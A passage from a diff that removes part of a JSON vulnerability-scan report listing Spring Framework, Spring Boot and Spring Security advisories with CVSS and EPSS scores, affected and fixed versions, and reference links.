-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.96483",
-          "probability": "0.30512"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790",
-        "initially_fixed_in_versions": [
-          "5.3.33",
-          "6.0.18",
-          "6.1.5"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-07-02T15:25:03.250566Z",
-        "package_name": "org.springframework:spring-web",
-        "package_version": "",
-        "published_at": "2024-03-15T10:42:12.997061Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0"
-          },
-          {
-            "title": "Spring Advisory",
-            "url": "https://spring.io/security/cve-2024-22259"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,5.3.34)",
-          "[6.0.0, 6.0.19)",
-          "[6.1.0, 6.1.6)"
-        ],
-        "created_at": "2024-04-12T08:32:41.735891Z",
-        "credits": [
-          "L0ne1y"
-        ],
-        "cvss_base_score": 5.4,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.4,
-            "cvss_version": "3.1",
-            "modified_at": "2025-07-24T14:04:36.898708Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:P"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.1,
-            "cvss_version": "3.1",
-            "modified_at": "2024-04-16T13:32:25.16395Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:P",
-        "disclosed_at": "2024-04-11T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.90482",
-          "probability": "0.06252"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980",
-        "initially_fixed_in_versions": [
-          "5.3.34",
-          "6.0.19",
-          "6.1.6"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-07-24T14:04:36.898708Z",
-        "package_name": "org.springframework:spring-web",
-        "package_version": "",
-        "published_at": "2024-04-12T08:32:41.913608Z",
-        "references": [
-          {
-            "title": "PoC",
-            "url": "https://github.com/Performant-Labs/CVE-2024-22262"
-          },
-          {
-            "title": "Spring Advisory",
-            "url": "https://spring.io/security/cve-2024-22262"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-7687447": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,5.3.38)",
-          "[6.0.0, 6.0.23)",
-          "[6.1.0, 6.1.12)"
-        ],
-        "created_at": "2024-08-15T09:11:43.544255Z",
-        "credits": [
-          "Seokchan Yoon"
-        ],
-        "cvss_base_score": 6.9,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 6.9,
-            "cvss_version": "4.0",
-            "modified_at": "2024-09-25T05:38:29.585478Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-09-25T05:38:29.585478Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-09-25T13:32:40.771352Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
-        "disclosed_at": "2024-08-14T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.18197",
-          "probability": "0.00058"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-7687447",
-        "initially_fixed_in_versions": [
-          "5.3.38",
-          "6.0.23",
-          "6.1.12"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-09-25T13:32:40.771352Z",
-        "package_name": "org.springframework:spring-web",
-        "package_version": "",
-        "published_at": "2024-08-15T09:11:43.817265Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/bb17ad8314b81850a939fd265fb53b3361705e85"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/fe4fd004291a1f2704281eb839609cf9e2fb5bea"
-          },
-          {
-            "title": "GitHub Issue",
-            "url": "https://github.com/spring-projects/spring-framework/issues/33372"
-          },
-          {
-            "title": "GitHub PR",
-            "url": "https://github.com/spring-projects/spring-framework/pull/33370"
-          },
-          {
-            "title": "GitHub PR",
-            "url": "https://github.com/spring-projects/spring-framework/pull/33374"
-          },
-          {
-            "title": "Spring Security Advisory",
-            "url": "https://spring.io/security/cve-2024-38809"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-7945490": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,6.1.13)"
-        ],
-        "created_at": "2024-09-13T07:28:37.302579Z",
-        "credits": [
-          "Gabor Legrady"
-        ],
-        "cvss_base_score": 8.7,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.7,
-            "cvss_version": "4.0",
-            "modified_at": "2024-10-05T15:25:03.835823Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-10-05T15:25:03.835823Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-09-17T13:31:35.023805Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
-        "disclosed_at": "2024-09-13T06:43:53.214Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.99839",
-          "probability": "0.93730"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Nuclei Templates",
-            "PoC in GitHub"
-          ]
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-7945490",
-        "initially_fixed_in_versions": [
-          "6.1.13"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-11-06T05:02:27.758623Z",
-        "package_name": "org.springframework:spring-webmvc",
-        "package_version": "",
-        "published_at": "2024-09-13T07:28:37.537406Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/d86bf8b2056429edf5494456cffcb2b243331c49"
-          },
-          {
-            "title": "Spring Security Advisory",
-            "url": "https://spring.io/security/cve-2024-38816"
-          },
-          {
-            "title": "Nuclei Templates",
-            "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-38816.yaml"
-          },
-          {
-            "title": "PoC in GitHub",
-            "url": "https://github.com/WULINPIN/CVE-2024-38816-PoC"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230364": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,6.1.14)"
-        ],
-        "created_at": "2024-10-18T09:17:42.796292Z",
-        "credits": [
-          "Marek Parfianowicz"
-        ],
-        "cvss_base_score": 2.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 2.3,
-            "cvss_version": "4.0",
-            "modified_at": "2025-01-05T16:36:40.023589Z",
-            "severity": "low",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 3.1,
-            "cvss_version": "3.1",
-            "modified_at": "2025-01-05T16:36:40.023589Z",
-            "severity": "low",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-10-23T01:12:28.4254Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
-        "disclosed_at": "2024-10-17T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.21661",
-          "probability": "0.00070"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230364",
-        "initially_fixed_in_versions": [
-          "6.1.14"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-01-05T16:36:40.023589Z",
-        "package_name": "org.springframework:spring-context",
-        "package_version": "",
-        "published_at": "2024-10-18T09:38:03.276082Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/23656aebc6c7d0f9faff1080981eb4d55eff296c"
-          },
-          {
-            "title": "Spring Security Advisory",
-            "url": "https://spring.io/security/cve-2024-38820"
-          }
-        ],
-        "severity": "low",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230365": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,6.1.14)"
-        ],
-        "created_at": "2024-10-18T09:17:43.165391Z",
-        "credits": [
-          "Marek Parfianowicz"
-        ],
-        "cvss_base_score": 2.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 2.3,
-            "cvss_version": "4.0",
-            "modified_at": "2025-01-05T16:36:40.023589Z",
-            "severity": "low",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 3.1,
-            "cvss_version": "3.1",
-            "modified_at": "2025-01-05T16:36:40.023589Z",
-            "severity": "low",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-10-23T01:12:28.4254Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
-        "disclosed_at": "2024-10-17T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.21661",
-          "probability": "0.00070"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230365",
-        "initially_fixed_in_versions": [
-          "6.1.14"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-01-05T16:36:40.023589Z",
-        "package_name": "org.springframework:spring-core",
-        "package_version": "",
-        "published_at": "2024-10-18T09:38:03.527869Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/23656aebc6c7d0f9faff1080981eb4d55eff296c"
-          },
-          {
-            "title": "Spring Security Advisory",
-            "url": "https://spring.io/security/cve-2024-38820"
-          }
-        ],
-        "severity": "low",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230366": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,6.1.14)"
-        ],
-        "created_at": "2024-10-18T09:17:43.571954Z",
-        "credits": [
-          "Marek Parfianowicz"
-        ],
-        "cvss_base_score": 2.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 2.3,
-            "cvss_version": "4.0",
-            "modified_at": "2025-01-05T16:36:40.023589Z",
-            "severity": "low",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 3.1,
-            "cvss_version": "3.1",
-            "modified_at": "2025-01-05T16:36:40.023589Z",
-            "severity": "low",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-10-23T01:12:28.4254Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
-        "disclosed_at": "2024-10-17T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.21661",
-          "probability": "0.00070"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230366",
-        "initially_fixed_in_versions": [
-          "6.1.14"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-01-05T16:36:40.023589Z",
-        "package_name": "org.springframework:spring-web",
-        "package_version": "",
-        "published_at": "2024-10-18T09:38:04.356609Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/23656aebc6c7d0f9faff1080981eb4d55eff296c"
-          },
-          {
-            "title": "Spring Security Advisory",
-            "url": "https://spring.io/security/cve-2024-38820"
-          }
-        ],
-        "severity": "low",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230368": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,6.1.14)"
-        ],
-        "created_at": "2024-10-18T09:17:44.352777Z",
-        "credits": [
-          "Marek Parfianowicz"
-        ],
-        "cvss_base_score": 2.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 2.3,
-            "cvss_version": "4.0",
-            "modified_at": "2025-01-05T16:36:40.023589Z",
-            "severity": "low",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 3.1,
-            "cvss_version": "3.1",
-            "modified_at": "2025-01-05T16:36:40.023589Z",
-            "severity": "low",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-10-23T01:12:28.4254Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
-        "disclosed_at": "2024-10-17T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.21661",
-          "probability": "0.00070"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230368",
-        "initially_fixed_in_versions": [
-          "6.1.14"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-01-05T16:36:40.023589Z",
-        "package_name": "org.springframework:spring-webmvc",
-        "package_version": "",
-        "published_at": "2024-10-18T09:38:03.798393Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/23656aebc6c7d0f9faff1080981eb4d55eff296c"
-          },
-          {
-            "title": "Spring Security Advisory",
-            "url": "https://spring.io/security/cve-2024-38820"
-          }
-        ],
-        "severity": "low",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230373": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,6.1.14)"
-        ],
-        "created_at": "2024-10-18T09:34:06.053097Z",
-        "credits": [
-          "Masato Anzai"
-        ],
-        "cvss_base_score": 8.7,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.7,
-            "cvss_version": "4.0",
-            "modified_at": "2024-11-18T08:58:03.948323Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-11-18T08:58:03.948323Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-11-26T13:34:43.180273Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
-        "disclosed_at": "2024-10-17T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.98517",
-          "probability": "0.67841"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "PoC in GitHub"
-          ]
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230373",
-        "initially_fixed_in_versions": [
-          "6.1.14"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-06-16T05:20:08.674725Z",
-        "package_name": "org.springframework:spring-webmvc",
-        "package_version": "",
-        "published_at": "2024-10-18T09:43:36.202769Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-framework/commit/fb7890d73975a3d9e0763e0926df2bd0a608e87e"
-          },
-          {
-            "title": "Spring Security Advisory",
-            "url": "https://spring.io/security/cve-2024-38819"
-          },
-          {
-            "title": "PoC in GitHub",
-            "url": "https://github.com/masa42/CVE-2024-38819-POC"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,2.7.18)",
-          "[3.0.0,3.0.13)",
-          "[3.1.0,3.1.6)"
-        ],
-        "created_at": "2024-02-02T14:28:25.101149Z",
-        "credits": [
-          "James Yuzawa"
-        ],
-        "cvss_base_score": 5.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:09:29.528477Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 6.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:54:08.73711Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 6.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-06-19T13:32:35.094729Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
-        "disclosed_at": "2023-11-27T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.52049",
-          "probability": "0.00290"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862",
-        "initially_fixed_in_versions": [
-          "2.7.18",
-          "3.0.13",
-          "3.1.6"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-06-19T13:32:35.094729Z",
-        "package_name": "org.springframework.boot:spring-boot-actuator",
-        "package_version": "",
-        "published_at": "2024-02-02T14:28:25.293606Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-boot/commit/5490e73922b37a7f0bdde43eb318cb1038b45d60"
-          },
-          {
-            "title": "Vulnerability Advisory",
-            "url": "https://spring.io/security/cve-2023-34055"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-9804539": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[2.7.0,3.3.11)",
-          "[3.4.0,3.4.5)"
-        ],
-        "created_at": "2025-04-25T12:27:16.933719Z",
-        "credits": [
-          "Janek Bettinger"
-        ],
-        "cvss_base_score": 6.9,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 6.9,
-            "cvss_version": "4.0",
-            "modified_at": "2025-04-25T12:27:17.357864Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 7.3,
-            "cvss_version": "3.1",
-            "modified_at": "2025-04-25T12:27:17.357864Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:F"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.3,
-            "cvss_version": "3.1",
-            "modified_at": "2025-04-29T13:33:35.163479Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P",
-        "disclosed_at": "2025-04-24T00:00:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.26608",
-          "probability": "0.00092"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "functional",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-9804539",
-        "initially_fixed_in_versions": [
-          "3.3.11",
-          "3.4.5"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-04-29T13:33:35.163479Z",
-        "package_name": "org.springframework.boot:spring-boot-actuator-autoconfigure",
-        "package_version": "",
-        "published_at": "2025-04-25T12:27:17.334043Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/spring-projects/spring-boot/commit/55f67c9a522647039fd3294dee5cb83f4888160a"
-          },
-          {
-            "title": "Spring Security Advisory",
-            "url": "https://spring.io/security/cve-2025-22235"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254467": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[6.1.0,6.1.7)",
-          "[6.2.0,6.2.2)"
-        ],
-        "created_at": "2024-02-20T14:02:10.836736Z",
-        "credits": [
-          "Rogério Sorroche"
-        ],
-        "cvss_base_score": 7.4,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.4,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:58:51.519414Z",
